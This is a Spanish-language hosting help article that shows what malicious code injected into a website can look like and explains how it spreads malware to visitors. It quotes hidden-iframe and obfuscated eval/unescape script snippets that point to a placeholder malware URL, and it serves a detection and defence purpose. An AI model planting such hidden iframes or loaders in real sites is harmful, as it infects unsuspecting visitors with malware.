Ejemplos de código potencialmente malicioso

A veces puede suceder que, a través de las aplicaciones web vulnerables o hurto de las propias credenciales de acceso al sitio, se inserte en las páginas web de su dominio un código potencialmente peligroso.
Referimos a continuación algunos ejemplos de cómo se puede presentar tal código:

 - <script>function v47e ...etc... 4950543E'));</script>
 - <iframe src='http://url_contenente_malware' width='1' height='1' style='visibility: hidden;'></iframe>
 - <script language="javascript">$= ...etc... ;eval(unescape($));document.write($);</script>
 - <!-- ~ --><div style="visibility:hidden"><iframe src="
http://url_contenente_malware" width=100 height=80></iframe></div><!-- ~ -->

En general estos códigos tienen una o más de las siguientes características:
• Tienen la propiedad "visibility: hidden" para no ser visible en la navegación normal del sitio.
• Usan una codificación para esconder su contenido durante la lectura de la página fuente.
• Llaman páginas externas a los servidores de Aruba, generalmente páginas que residen en servidores comprometidos y que contienen malware.

La finalidad principal por la cual un sujeto puede intentar introducir tal código en un sitio lícito, es la difusión de malware a los visitantes de tal sitio. En la práctica, si existe código similar al indicado precedentemente, el navegador de un visitante genérico es redireccionado a la página externa rellamada por el código.
En tal página puede existir malware que trata de instalarse en el ordenador del visitante intentando explotar un cierto número de vulnerabilidades advertidas.
Si el PC del visitante no está adecuadamente protegido hay riesgo de que sea infectado.

En el caso de que tuviese que individualizar en su dominio código similar al indicado, se aconseja de seguir las instrucciones del artículo 'Qué hacer ante código malicioso en el sitio'.